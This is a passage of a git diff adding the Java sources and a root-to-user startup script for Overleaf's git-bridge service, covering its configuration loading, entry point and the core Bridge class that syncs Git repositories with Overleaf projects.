<dependency> + <groupId>org.bouncycastle</groupId> + <artifactId>bcpkix-jdk15on</artifactId> + <version>${bouncycastle.crypto.version}</version> + <scope>test</scope> + </dependency> + </dependencies> +</project> diff --git a/services/git-bridge/server-pro-start.sh b/services/git-bridge/server-pro-start.sh new file mode 100755 index 0000000..7a01d2f --- /dev/null +++ b/services/git-bridge/server-pro-start.sh @@ -0,0 +1,12 @@ +#!/bin/bash + +# This script is meant to be run as root when the git bridge starts up in +# Server Pro. It ensures that the data directory is created and owned by the +# "node" user, which is the regular user git bridge runs as. + +ROOT_DIR="${GIT_BRIDGE_ROOT_DIR:-/tmp/wlgb}" +mkdir -p "$ROOT_DIR" +chown node:node "$ROOT_DIR" + +# Drop privileges using setpriv to avoid spawning a new process +exec setpriv --reuid=node --regid=node --init-groups /start.sh diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/Main.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/Main.java new file mode 100644 index 0000000..5e365b8 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/Main.java @@ -0,0 +1,39 @@ +package uk.ac.ic.wlgitbridge; + +import java.util.Arrays; +import uk.ac.ic.wlgitbridge.application.GitBridgeApp; +import uk.ac.ic.wlgitbridge.util.Log; + +/* + * Created by Winston on 01/11/14. + */ + +/* + * This is the entry point into the Git Bridge. + * + * It is responsible for creating the {@link GitBridgeApp} and then running it. + * + * The {@link GitBridgeApp} parses args and creates the {@link GitBridgeServer}. + * + * The {@link GitBridgeServer} creates the {@link Bridge}, among other things. + * + * The {@link Bridge} is the heart of the Git Bridge. Start there, and follow + * the links outwards (which lead back to the Git users and the postback from + * the snapshot API) and inwards (which lead into the components of the Git + * Bridge: the configurable repo store, db store, and swap store, along with + * the project lock, the swap job, the snapshot API, the resource cache + * and the postback manager). + */ +public class Main { + + public static void main(String[] args) { + Log.info("Git Bridge started with args: " + Arrays.toString(args)); + try { + new GitBridgeApp(args).run(); + } catch (Throwable t) { + /* So that we get a timestamp */ + Log.error("Fatal exception thrown to top level, exiting: ", t); + System.exit(1); + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/application/GitBridgeApp.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/application/GitBridgeApp.java new file mode 100644 index 0000000..e3cb952 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/application/GitBridgeApp.java @@ -0,0 +1,93 @@ +package uk.ac.ic.wlgitbridge.application; + +import java.io.IOException; +import javax.servlet.ServletException; +import uk.ac.ic.wlgitbridge.application.config.Config; +import uk.ac.ic.wlgitbridge.application.exception.ArgsException; +import uk.ac.ic.wlgitbridge.application.exception.ConfigFileException; +import uk.ac.ic.wlgitbridge.server.GitBridgeServer; +import uk.ac.ic.wlgitbridge.util.Log; + +/* + * Created by Winston on 02/11/14. + */ + +/* + * Class that represents the application. Parses arguments and gives them to the + * server, or dies with a usage message. + */ +public class GitBridgeApp implements Runnable { + + public static final int EXIT_CODE_FAILED = 1; + private static final String USAGE_MESSAGE = "usage: writelatex-git-bridge [config_file]"; + + private String configFilePath; + Config config; + private GitBridgeServer server; + + /* + * Constructs an instance of the WriteLatex-Git Bridge application. + * @param args args from main, which should be in the format [config_file] + */ + public GitBridgeApp(String[] args) { + try { + parseArguments(args); + loadConfigFile(); + Log.info("Config loaded: {}", config.getSanitisedString()); + } catch (ArgsException e) { + printUsage(); + System.exit(EXIT_CODE_FAILED); + } catch (ConfigFileException e) { + Log.error( + "The property for " + e.getMissingMember() + " is invalid. Check your config file."); + System.exit(EXIT_CODE_FAILED); + } catch (IOException e) { + Log.error("Invalid config file. Check the file path."); + System.exit(EXIT_CODE_FAILED); + } + try { + server = new GitBridgeServer(config); + } catch (ServletException e) { + Log.error("Servlet exception when instantiating GitBridgeServer", e); + } + } + + /* + * Starts the server with the port number and root directory path given in + * the command-line arguments. + */ + @Override + public void run() { + server.start(); + } + + public void stop() { + server.stop(); + } + + /* Helper methods */ + + private void parseArguments(String[] args) throws ArgsException { + checkArgumentsLength(args); + parseConfigFilePath(args); + } + + private void checkArgumentsLength(String[] args) throws ArgsException { + if (args.length < 1) { + throw new ArgsException(); + } + } + + private void parseConfigFilePath(String[] args) throws ArgsException { + configFilePath = args[0]; + } + + private void loadConfigFile() throws ConfigFileException, IOException { + Log.info("Loading config file at path: " + configFilePath); + config = new Config(configFilePath); + } + + private void printUsage() { + System.err.println(USAGE_MESSAGE); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/application/config/Config.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/application/config/Config.java new file mode 100644 index 0000000..d5b5301 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/application/config/Config.java @@ -0,0 +1,204 @@ +package uk.ac.ic.wlgitbridge.application.config; + +import com.google.gson.Gson; +import com.google.gson.JsonElement; +import com.google.gson.JsonObject; +import java.io.FileReader; +import java.io.IOException; +import java.io.Reader; +import java.util.Optional; +import javax.annotation.Nullable; +import uk.ac.ic.wlgitbridge.application.exception.ConfigFileException; +import uk.ac.ic.wlgitbridge.bridge.repo.RepoStoreConfig; +import uk.ac.ic.wlgitbridge.bridge.swap.job.SwapJobConfig; +import uk.ac.ic.wlgitbridge.bridge.swap.store.SwapStoreConfig; +import uk.ac.ic.wlgitbridge.snapshot.base.JSONSource; +import uk.ac.ic.wlgitbridge.util.Instance; + +/* + * Created by Winston on 05/12/14. + */ +public class Config implements JSONSource { + + static Config asSanitised(Config config) { + return new Config( + config.port, + config.bindIp, + config.idleTimeout, + config.rootGitDirectory, + config.allowedCorsOrigins, + config.apiBaseURL, + config.postbackURL, + config.serviceName, + config.oauth2Server, + config.userPasswordEnabled, + config.repoStore, + SwapStoreConfig.sanitisedCopy(config.swapStore), + config.swapJob, + config.sqliteHeapLimitBytes); + } + + private int port; + private String bindIp; + private int idleTimeout; + private String rootGitDirectory; + private String[] allowedCorsOrigins; + private String apiBaseURL; + private String postbackURL; + private String serviceName; + @Nullable private String oauth2Server; + private boolean userPasswordEnabled; + @Nullable private RepoStoreConfig repoStore; + @Nullable private SwapStoreConfig swapStore; + @Nullable private SwapJobConfig swapJob; + private int sqliteHeapLimitBytes = 0; + + public Config(String configFilePath) throws ConfigFileException, IOException { + this(new FileReader(configFilePath)); + } + + Config(Reader reader) { + fromJSON(new Gson().fromJson(reader, JsonElement.class)); + } + + public Config( + int port, + String bindIp, + int idleTimeout, + String rootGitDirectory, + String[] allowedCorsOrigins, + String apiBaseURL, + String postbackURL, + String serviceName, + String oauth2Server, + boolean userPasswordEnabled, + RepoStoreConfig repoStore, + SwapStoreConfig swapStore, + SwapJobConfig swapJob, + int sqliteHeapLimitBytes) { + this.port = port; + this.bindIp = bindIp; + this.idleTimeout = idleTimeout; + this.rootGitDirectory = rootGitDirectory; + this.allowedCorsOrigins = allowedCorsOrigins; + this.apiBaseURL = apiBaseURL; + this.postbackURL = postbackURL; + this.serviceName = serviceName; + this.oauth2Server = oauth2Server; + this.userPasswordEnabled = userPasswordEnabled; + this.repoStore = repoStore; + this.swapStore = swapStore; + this.swapJob = swapJob; + this.sqliteHeapLimitBytes = sqliteHeapLimitBytes; + } + + @Override + public void fromJSON(JsonElement json) { + JsonObject configObject = json.getAsJsonObject(); + port = getElement(configObject, "port").getAsInt(); + bindIp = getElement(configObject, "bindIp").getAsString(); + idleTimeout = getElement(configObject, "idleTimeout").getAsInt(); + rootGitDirectory = getElement(configObject, "rootGitDirectory").getAsString(); + String apiBaseURL = getElement(configObject, "apiBaseUrl").getAsString(); + if (!apiBaseURL.endsWith("/")) { + apiBaseURL += "/"; + } + this.apiBaseURL = apiBaseURL; + serviceName = getElement(configObject, "serviceName").getAsString(); + final String rawAllowedCorsOrigins = + getOptionalString(configObject, "allowedCorsOrigins").trim(); + if (rawAllowedCorsOrigins.isEmpty()) { + allowedCorsOrigins = new String[] {}; + } else { + allowedCorsOrigins = rawAllowedCorsOrigins.split(","); + } + postbackURL = getElement(configObject, "postbackBaseUrl").getAsString(); + if (!postbackURL.endsWith("/")) { + postbackURL += "/"; + } + oauth2Server = getOptionalString(configObject, "oauth2Server"); + userPasswordEnabled = getOptionalString(configObject, "userPasswordEnabled").equals("true"); + repoStore = new Gson().fromJson(configObject.get("repoStore"), RepoStoreConfig.class); + swapStore = new Gson().fromJson(configObject.get("swapStore"), SwapStoreConfig.class); + swapJob = new Gson().fromJson(configObject.get("swapJob"), SwapJobConfig.class); + if (configObject.has("sqliteHeapLimitBytes")) { + sqliteHeapLimitBytes = getElement(configObject, "sqliteHeapLimitBytes").getAsInt(); + } + } + + public String getSanitisedString() { + return Instance.prettyGson.toJson(Config.asSanitised(this)); + } + + public int getPort() { + return port; + } + + public String getBindIp() { + return bindIp; + } + + public int getIdleTimeout() { + return idleTimeout; + } + + public String getRootGitDirectory() { + return rootGitDirectory; + } + + public int getSqliteHeapLimitBytes() { + return this.sqliteHeapLimitBytes; + } + + public String[] getAllowedCorsOrigins() { + return allowedCorsOrigins; + } + + public String getAPIBaseURL() { + return apiBaseURL; + } + + public String getServiceName() { + return serviceName; + } + + public String getPostbackURL() { + return postbackURL; + } + + public boolean isUserPasswordEnabled() { + return userPasswordEnabled; + } + + public String getOauth2Server() { + return oauth2Server; + } + + public Optional<RepoStoreConfig> getRepoStore() { + return Optional.ofNullable(repoStore); + } + + public Optional<SwapStoreConfig> getSwapStore() { + return Optional.ofNullable(swapStore); + } + + public Optional<SwapJobConfig> getSwapJob() { + return Optional.ofNullable(swapJob); + } + + private JsonElement getElement(JsonObject configObject, String name) { + JsonElement element = configObject.get(name); + if (element == null) { + throw new RuntimeException(new ConfigFileException(name)); + } + return element; + } + + private String getOptionalString(JsonObject configObject, String name) { + JsonElement element = configObject.get(name); + if (element == null || !element.isJsonPrimitive()) { + return ""; + } + return element.getAsString(); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/application/exception/ArgsException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/application/exception/ArgsException.java new file mode 100644 index 0000000..5717aff --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/application/exception/ArgsException.java @@ -0,0 +1,6 @@ +package uk.ac.ic.wlgitbridge.application.exception; + +/* + * Created by Winston on 03/11/14. + */ +public class ArgsException extends Exception {} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/application/exception/ConfigFileException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/application/exception/ConfigFileException.java new file mode 100644 index 0000000..8e6ac7d --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/application/exception/ConfigFileException.java @@ -0,0 +1,17 @@ +package uk.ac.ic.wlgitbridge.application.exception; + +/* + * Created by Winston on 05/12/14. + */ +public class ConfigFileException extends Exception { + + private final String missingMember; + + public ConfigFileException(String missingMember) { + this.missingMember = missingMember; + } + + public String getMissingMember() { + return missingMember; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/application/jetty/NullLogger.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/application/jetty/NullLogger.java new file mode 100644 index 0000000..4543a59 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/application/jetty/NullLogger.java @@ -0,0 +1,60 @@ +package uk.ac.ic.wlgitbridge.application.jetty; + +import org.eclipse.jetty.util.log.Logger; + +/* + * Created by Winston on 03/11/14. + */ +public class NullLogger implements Logger { + + @Override + public String getName() { + return "null_logger"; + } + + @Override + public void warn(String s, Object... objects) {} + + @Override + public void warn(Throwable throwable) {} + + @Override + public void warn(String s, Throwable throwable) {} + + @Override + public void info(String s, Object... objects) {} + + @Override + public void info(Throwable throwable) {} + + @Override + public void info(String s, Throwable throwable) {} + + @Override + public boolean isDebugEnabled() { + return false; + } + + @Override + public void setDebugEnabled(boolean b) {} + + @Override + public void debug(String s, Object... objects) {} + + @Override + public void debug(String s, long l) {} + + @Override + public void debug(Throwable throwable) {} + + @Override + public void debug(String s, Throwable throwable) {} + + @Override + public Logger getLogger(String s) { + return this; + } + + @Override + public void ignore(Throwable throwable) {} +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/Bridge.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/Bridge.java new file mode 100644 index 0000000..83fbeda --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/Bridge.java @@ -0,0 +1,709 @@ +package uk.ac.ic.wlgitbridge.bridge; + +import com.google.api.client.auth.oauth2.Credential; +import java.io.File; +import java.io.IOException; +import java.sql.Timestamp; +import java.time.LocalDateTime; +import java.util.*; +import org.eclipse.jgit.errors.RepositoryNotFoundException; +import uk.ac.ic.wlgitbridge.application.config.Config; +import uk.ac.ic.wlgitbridge.bridge.db.DBStore; +import uk.ac.ic.wlgitbridge.bridge.db.ProjectState; +import uk.ac.ic.wlgitbridge.bridge.gc.GcJob; +import uk.ac.ic.wlgitbridge.bridge.gc.GcJobImpl; +import uk.ac.ic.wlgitbridge.bridge.lock.LockGuard; +import uk.ac.ic.wlgitbridge.bridge.lock.ProjectLock; +import uk.ac.ic.wlgitbridge.bridge.repo.*; +import uk.ac.ic.wlgitbridge.bridge.resource.ResourceCache; +import uk.ac.ic.wlgitbridge.bridge.resource.UrlResourceCache; +import uk.ac.ic.wlgitbridge.bridge.snapshot.SnapshotApi; +import uk.ac.ic.wlgitbridge.bridge.snapshot.SnapshotApiFacade; +import uk.ac.ic.wlgitbridge.bridge.swap.job.SwapJob; +import uk.ac.ic.wlgitbridge.bridge.swap.store.SwapStore; +import uk.ac.ic.wlgitbridge.data.CandidateSnapshot; +import uk.ac.ic.wlgitbridge.data.CannotAcquireLockException; +import uk.ac.ic.wlgitbridge.data.ProjectLockImpl; +import uk.ac.ic.wlgitbridge.data.filestore.GitDirectoryContents; +import uk.ac.ic.wlgitbridge.data.filestore.RawDirectory; +import uk.ac.ic.wlgitbridge.data.filestore.RawFile; +import uk.ac.ic.wlgitbridge.data.model.Snapshot; +import uk.ac.ic.wlgitbridge.git.exception.FileLimitExceededException; +import uk.ac.ic.wlgitbridge.git.exception.GitUserException; +import uk.ac.ic.wlgitbridge.git.exception.SizeLimitExceededException; +import uk.ac.ic.wlgitbridge.snapshot.base.ForbiddenException; +import uk.ac.ic.wlgitbridge.snapshot.base.MissingRepositoryException; +import uk.ac.ic.wlgitbridge.snapshot.getdoc.GetDocResult; +import uk.ac.ic.wlgitbridge.snapshot.getforversion.SnapshotAttachment; +import uk.ac.ic.wlgitbridge.snapshot.push.PostbackManager; +import uk.ac.ic.wlgitbridge.snapshot.push.PushResult; +import uk.ac.ic.wlgitbridge.snapshot.push.exception.*; +import uk.ac.ic.wlgitbridge.util.Log; + +/* + * This is the heart of the Git Bridge. You plug in all the parts (project + * lock, repo store, db store, swap store, snapshot api, resource cache and + * postback manager) is called by Git user requests and Overleaf postback + * requests. + * + * Follow these links to go "outward" (to input from Git users and Overleaf): + * + * 1. JGit hooks, which handle user Git requests: + * + * @see WLRepositoryResolver - used on all requests associate a repo with a + * project name, or fail + * + * @see WLUploadPackFactory - used to handle clones and fetches + * + * @see WLReceivePackFactory - used to handle pushes by setting a hook + * @see WriteLatexPutHook - the hook used to handle pushes + * + * 2. The Postback Servlet, which handles postbacks from the Overleaf app + * to confirm that a project is pushed. If a postback is lost, it's fine, we + * just update ourselves on the next access. + * + * @see PostbackHandler - the entry point for postbacks + * + * Follow these links to go "inward" (to the Git Bridge components): + * + * 1. The Project Lock, used to synchronise accesses to projects and shutdown + * the Git Bridge gracefully by preventing further lock acquiring. + * + * @see ProjectLock - the interface used for the Project Lock + * @see ProjectLockImpl - the default concrete implementation + * + * 2. The Repo Store, used to provide repository objects. + * + * The default implementation uses Git on the file system. + * + * @see RepoStore - the interface for the Repo Store + * @see FSGitRepoStore - the default concrete implementation + * @see ProjectRepo - an interface for an actual repo instance + * @see GitProjectRepo - the default concrete implementation + * + * 3. The DB Store, used to store persistent data such as the latest version + * of each project that we have (used for querying the Snapshot API), along + * with caching remote blobs. + * + * The default implementation is SQLite based. + * + * @see DBStore - the interface for the DB store + * @see SqliteDBStore - the default concrete implementation + * + * 4. The Swap Store, used to swap projects to when the disk goes over a + * certain data usage. + * + * The default implementation tarbzips projects to/from Amazon S3. + * + * @see SwapStore - the interface for the Swap Store + * @see S3SwapStore - the default concrete implementation + * + * 5. The Swap Job, which performs the actual swapping on the swap store based + * on various configuration options. + * + * @see SwapJob - the interface for the Swap Job + * @see SwapJobImpl - the default concrete implementation + * + * 6. The Snapshot API, which provides data from the Overleaf app. + * + * @see SnapshotApiFacade - wraps a concrete instance of the Snapshot API. + * @see SnapshotApi - the interface for the Snapshot API. + * @see NetSnapshotApi - the default concrete implementation + * + * 7. The Resource Cache, which provides the data for attachment resources from + * URLs. It will generally fetch from the source on a cache miss. + * + * The default implementation uses the DB Store to maintain a mapping from + * URLs to files in an actual repo. + * + * @see ResourceCache - the interface for the Resource Cache + * @see UrlResourceCache - the default concrete implementation + * + * 8. The Postback Manager, which keeps track of pending postbacks. It stores a + * mapping from project names to postback promises. + * + * @see PostbackManager - the class + * @see PostbackPromise - the object waited on for a postback. + * + */ +public class Bridge { + + private final Config config; + + private final ProjectLock lock; + + private final RepoStore repoStore; + private final DBStore dbStore; + private final SwapStore swapStore; + private final SwapJob swapJob; + private final GcJob gcJob; + + private final SnapshotApiFacade snapshotAPI; + private final ResourceCache resourceCache; + + private final PostbackManager postbackManager; + + /* + * Creates a Bridge from its configurable parts, which are the repo, db and + * swap store, and the swap job config. + * + * This should be the method used to create a Bridge. + * @param config The config to use + * @param repoStore The repo store to use + * @param dbStore The db store to use + * @param swapStore The swap store to use + * @param snapshotApi The snapshot api to use + * @return The constructed Bridge. + */ + public static Bridge make( + Config config, + RepoStore repoStore, + DBStore dbStore, + SwapStore swapStore, + SnapshotApi snapshotApi) { + ProjectLock lock = + new ProjectLockImpl((int threads) -> Log.info("Waiting for " + threads + " projects...")); + return new Bridge( + config, + lock, + repoStore, + dbStore, + swapStore, + SwapJob.fromConfig(config.getSwapJob(), lock, repoStore, dbStore, swapStore), + new GcJobImpl(repoStore, lock), + new SnapshotApiFacade(snapshotApi), + new UrlResourceCache(dbStore)); + } + + /* + * Creates a bridge from all of its components, not just its configurable + * parts. This is for substituting mock/stub components for testing. + * It's also used by Bridge.make to actually construct the bridge. + * @param lock the {@link ProjectLock} to use + * @param repoStore the {@link RepoStore} to use + * @param dbStore the {@link DBStore} to use + * @param swapStore the {@link SwapStore} to use + * @param swapJob the {@link SwapJob} to use + * @param gcJob + * @param snapshotAPI the {@link SnapshotApi} to use + * @param resourceCache the {@link ResourceCache} to use + */ + Bridge( + Config config, + ProjectLock lock, + RepoStore repoStore, + DBStore dbStore, + SwapStore swapStore, + SwapJob swapJob, + GcJob gcJob, + SnapshotApiFacade snapshotAPI, + ResourceCache resourceCache) { + this.config = config; + this.lock = lock; + this.repoStore = repoStore; + this.dbStore = dbStore; + this.swapStore = swapStore; + this.snapshotAPI = snapshotAPI; + this.resourceCache = resourceCache; + this.swapJob = swapJob; + this.gcJob = gcJob; + postbackManager = new PostbackManager(); + Runtime.getRuntime().addShutdownHook(new Thread(this::doShutdown)); + repoStore.purgeNonexistentProjects(dbStore.getProjectNames()); + } + + /* + * This performs the graceful shutdown of the Bridge, which is called by the + * shutdown hook. It acquires the project write lock, which prevents + * work being done for new projects (which acquire the read lock). + * Once it has the write lock, there are no readers left, so the git bridge + * can shut down gracefully. + * + * It is also used by the tests. + */ + void doShutdown() { + Log.info("Shutdown received."); + Log.info("Stopping SwapJob"); + swapJob.stop(); + Log.info("Stopping GcJob"); + gcJob.stop(); + Log.info("Waiting for projects"); + lock.lockAll(); + Log.info("Bye"); + } + + /* + * Starts the swap job, which will begin checking whether projects should be + * swapped with a configurable frequency. + */ + public void startBackgroundJobs() { + swapJob.start(); + gcJob.start(); + } + + public boolean healthCheck() { + try { + dbStore.getNumProjects(); + File rootDirectory = new File("/"); + if (!rootDirectory.exists()) { + throw new Exception("bad filesystem state, root directory does not exist"); + } + Log.debug("[HealthCheck] passed"); + return true; + } catch (Exception e) { + Log.error("[HealthCheck] FAILED!", e); + return false; + } + } + + /* + * Performs a check of inconsistencies in the DB. This was used to upgrade + * the schema. + */ + public void checkDB() { + Log.info("Checking DB"); + File rootDir = repoStore.getRootDirectory(); + for (File f : rootDir.listFiles()) { + if (f.getName().equals(".wlgb")) { + continue; + } + String projName = f.getName(); + try (LockGuard __ = lock.lockGuard(projName)) { + File dotGit = new File(f, ".git"); + if (!dotGit.exists()) { + Log.warn("Project: {} has no .git", projName); + continue; + } + ProjectState state = dbStore.getProjectState(projName); + if (state != ProjectState.NOT_PRESENT) { + continue; + } + Log.warn("Project: {} not in swap_store, adding", projName); + dbStore.setLastAccessedTime(projName, new Timestamp(dotGit.lastModified())); + } catch (CannotAcquireLockException e) { + throw new RuntimeException(e); + } + } + } + + /* + * Synchronises the given repository with Overleaf. + * + * It acquires the project lock and calls + * {@link #getUpdatedRepoCritical(Optional, String, GetDocResult)}. + * @param oauth2 The oauth2 to use + * @param projectName The name of the project + * @throws IOException + * @throws GitUserException + */ + public ProjectRepo getUpdatedRepo(Optional<Credential> oauth2, String projectName) + throws IOException, GitUserException, CannotAcquireLockException { + try (LockGuard __ = lock.lockGuard(projectName)) { + Optional<GetDocResult> maybeDoc = snapshotAPI.getDoc(oauth2, projectName); + if (!maybeDoc.isPresent()) { + throw new RepositoryNotFoundException(projectName); + } + GetDocResult doc = maybeDoc.get(); + Log.debug("[{}] Updating repository", projectName); + return getUpdatedRepoCritical(oauth2, projectName, doc); + } + } + + /* + * Synchronises the given repository with Overleaf. + * + * Pre: the project lock must be acquired for the given repo. + * + * 1. Queries the project state for the given project name. + * a. NOT_PRESENT = We've never seen it before, and the row for the + * project doesn't even exist. The project definitely + * exists because we would have aborted otherwise. + * b. PRESENT = The project is on disk. + * c. SWAPPED = The project is in the {@link SwapStore} + * + * If the project has never been cloned, it is git init'd. If the project + * is in swap, it is restored to disk. Otherwise, the project was already + * present. + * + * With the project present, snapshots are downloaded from the snapshot + * API with {@link #updateProject(Optional, ProjectRepo)}. + * + * Then, the last accessed time of the project is set to the current time. + * This is to support the LRU of the swap store. + * @param oauth2 + * @param projectName The name of the project + * @throws IOException + * @throws GitUserException + */ + private ProjectRepo getUpdatedRepoCritical( + Optional<Credential> oauth2, String projectName, GetDocResult doc) + throws IOException, GitUserException { + ProjectRepo repo; + ProjectState state = dbStore.getProjectState(projectName); + switch (state) { + case NOT_PRESENT: + Log.info("[{}] Repo not present", projectName); + repo = repoStore.initRepo(projectName); + break; + case SWAPPED: + swapJob.restore(projectName); + repo = repoStore.getExistingRepo(projectName); + break; + default: + repo = repoStore.getExistingRepo(projectName); + } + updateProject(oauth2, repo); + dbStore.setLastAccessedTime(projectName, Timestamp.valueOf(LocalDateTime.now())); + return repo; + } + + /* + * The public call to push a project. + * + * It acquires the lock and calls {@link #pushCritical( + * Optional, + * String, + * RawDirectory, + * RawDirectory + * )}, catching exceptions, logging, and rethrowing them. + * @param oauth2 The oauth2 to use for the snapshot API + * @param projectName The name of the project to push to + * @param directoryContents The new contents of the project + * @param oldDirectoryContents The old contents of the project + * @param hostname + * @throws SnapshotPostException + * @throws IOException + * @throws MissingRepositoryException + * @throws ForbiddenException + * @throws GitUserException + */ + public void push( + Optional<Credential> oauth2, + String projectName, + RawDirectory directoryContents, + RawDirectory oldDirectoryContents, + String hostname) + throws SnapshotPostException, + IOException, + MissingRepositoryException, + ForbiddenException, + GitUserException, + CannotAcquireLockException { + Log.debug("[{}] pushing to Overleaf", projectName); + try (LockGuard __ = lock.lockGuard(projectName)) { + Log.info("[{}] got project lock", projectName); + pushCritical(oauth2, projectName, directoryContents, oldDirectoryContents); + } catch (SevereSnapshotPostException e) { + Log.warn("[" + projectName + "] Failed to put to Overleaf", e); + throw e; + } catch (SnapshotPostException e) { + /* Stack trace should be printed further up */ + Log.warn( + "[{}] Exception when waiting for postback: {}", + projectName, + e.getClass().getSimpleName()); + throw e; + } catch (IOException e) { + Log.warn("[{}] IOException on put: {}", projectName, e); + throw e; + } + + gcJob.queueForGc(projectName); + } + + /* + * Does the work of pushing to a project, assuming the project lock is held. + * The {@link WriteLatexPutHook} is the original caller, and when we return + * without throwing, the commit is committed. + * + * We start off by creating a postback key, which is given in the url when + * the Overleaf app tries to access the atts. + * + * Then creates a {@link CandidateSnapshot} from the old and new project + * contents. The + * {@link CandidateSnapshot} is created using + * {@link #createCandidateSnapshot(String, RawDirectory, RawDirectory)}, + * which creates the snapshot object and writes the push files to the + * atts directory, which is served by the {@link PostbackHandler}. + * The files are deleted at the end of a try-with-resources block. + * + * Then 3 things are used to make the push request to the snapshot API: + * 1. The oauth2 + * 2. The candidate snapshot + * 3. The postback key + * + * If the snapshot API reports this as not successful, we immediately throw + * an {@link OutOfDateException}, which goes back to the user. + * + * Otherwise, we wait (with a timeout) on a promise from the postback + * manager, which can throw back to the user. + * + * If this is successful, we approve the snapshot with + * {@link #approveSnapshot(int, CandidateSnapshot)}, which updates our side + * of the push: the latest version and the URL index store. + * + * Then, we set the last accessed time for the swap store. + * + * Finally, after we return, the push to the repo from the hook is + * successful and the repo gets updated. + * + * @param oauth2 + * @param projectName + * @param directoryContents + * @param oldDirectoryContents + * @throws IOException + * @throws MissingRepositoryException + * @throws ForbiddenException + * @throws SnapshotPostException + * @throws GitUserException + */ + private void pushCritical( + Optional<Credential> oauth2, + String projectName, + RawDirectory directoryContents, + RawDirectory oldDirectoryContents) + throws IOException, + MissingRepositoryException, + ForbiddenException, + SnapshotPostException, + GitUserException { + Optional<Long> maxFileNum = config.getRepoStore().flatMap(RepoStoreConfig::getMaxFileNum); + if (maxFileNum.isPresent()) { + long maxFileNum_ = maxFileNum.get(); + if (directoryContents.getFileTable().size() > maxFileNum_) { + Log.warn( + "[{}] Too many files: {}/{}", + projectName, + directoryContents.getFileTable().size(), + maxFileNum_); + throw new FileLimitExceededException(directoryContents.getFileTable().size(), maxFileNum_); + } + } + Log.debug( + "[{}] Pushing files ({} new, {} old)", + projectName, + directoryContents.getFileTable().size(), + oldDirectoryContents.getFileTable().size()); + String postbackKey = postbackManager.makeKeyForProject(projectName); + Log.debug("[{}] Created postback key: {}", projectName, postbackKey); + try (CandidateSnapshot candidate = + createCandidateSnapshot(projectName, directoryContents, oldDirectoryContents); ) { + Log.debug("[{}] Candidate snapshot created: {}", projectName, candidate); + PushResult result = snapshotAPI.push(oauth2, candidate, postbackKey); + if (result.wasSuccessful()) { + Log.debug("[{}] Push to Overleaf successful", projectName); + Log.debug("[{}] Waiting for postback...", projectName); + int versionID = postbackManager.waitForVersionIdOrThrow(projectName); + Log.debug("[{}] Got version ID for push: {}", projectName, versionID); + approveSnapshot(versionID, candidate); + Log.debug("[{}] Approved version ID: {}", projectName, versionID); + dbStore.setLastAccessedTime(projectName, Timestamp.valueOf(LocalDateTime.now())); + } else { + Log.warn("[{}] Went out of date while waiting for push", projectName); + throw new OutOfDateException(); + } + } + } + + /* + * A public call that should originate from the {@link FileHandler}. + * + * The {@link FileHandler} serves atts to the Overleaf app during a push. + * The Overleaf app includes the postback key in the request, which was + * originally given on a push request. + * + * This method checks that the postback key matches, and throws if not. + * + * The FileHandler should not serve the file if this throws. + * @param projectName The project name that this key belongs to + * @param postbackKey The key + * @throws InvalidPostbackKeyException If the key doesn't match + */ + public void checkPostbackKey(String projectName, String postbackKey) + throws InvalidPostbackKeyException { + postbackManager.checkPostbackKey(projectName, postbackKey); + } + + /* + * A public call that originates from the postback thread + * {@link PostbackContents#processPostback()}, i.e. once the Overleaf app + * has fetched all the atts and has committed the push and is happy, it + * calls back here, fulfilling the promise that the push + * {@link #push(Optional, String, RawDirectory, RawDirectory, String)} + * is waiting on. + * + * The Overleaf app will have invented a new version for the push, which is + * passed to the promise for the original push request to update the app. + * @param projectName The name of the project being pushed to + * @param postbackKey The postback key being used + * @param versionID the new version id to use + * @throws UnexpectedPostbackException if the postback key is invalid + */ + public void postbackReceivedSuccessfully(String projectName, String postbackKey, int versionID) + throws UnexpectedPostbackException { + Log.debug( + "[{}]" + " Postback received by postback thread, version: {}", projectName, versionID); + postbackManager.postVersionIDForProject(projectName, versionID, postbackKey); + } + + /* + * As with {@link #postbackReceivedSuccessfully(String, String, int)}, + * but with an exception instead. + * + * This is based on the JSON body of the postback from the Overleaf app. + * + * The most likely problem is an {@link OutOfDateException}. + * @param projectName The name of the project + * @param postbackKey The postback key being used + * @param exception The exception encountered + * @throws UnexpectedPostbackException If the postback key is invalid + */ + public void postbackReceivedWithException( + String projectName, String postbackKey, SnapshotPostException exception) + throws UnexpectedPostbackException { + Log.warn("[{}] Postback received with exception", projectName); + postbackManager.postExceptionForProject(projectName, exception, postbackKey); + } + + /* + * Delete a project's data + */ + public void deleteProject(String projectName) { + Log.info("[{}] deleting project", projectName); + dbStore.deleteProject(projectName); + try { + repoStore.remove(projectName); + } catch (IOException e) { + Log.warn("Failed to delete repository for project {}: {}", projectName, e); + } + swapStore.remove(projectName); + } + + /* PRIVATE */ + + /* + * Called by {@link #getUpdatedRepoCritical(Optional, String)} + * + * Does the actual work of getting the snapshots for a project from the + * snapshot API and committing them to a repo. + * + * If any snapshots were found, sets the latest version for the project. + * + * @param oauth2 + * @param repo + * @throws IOException + * @throws GitUserException + */ + private void updateProject(Optional<Credential> oauth2, ProjectRepo repo) + throws IOException, 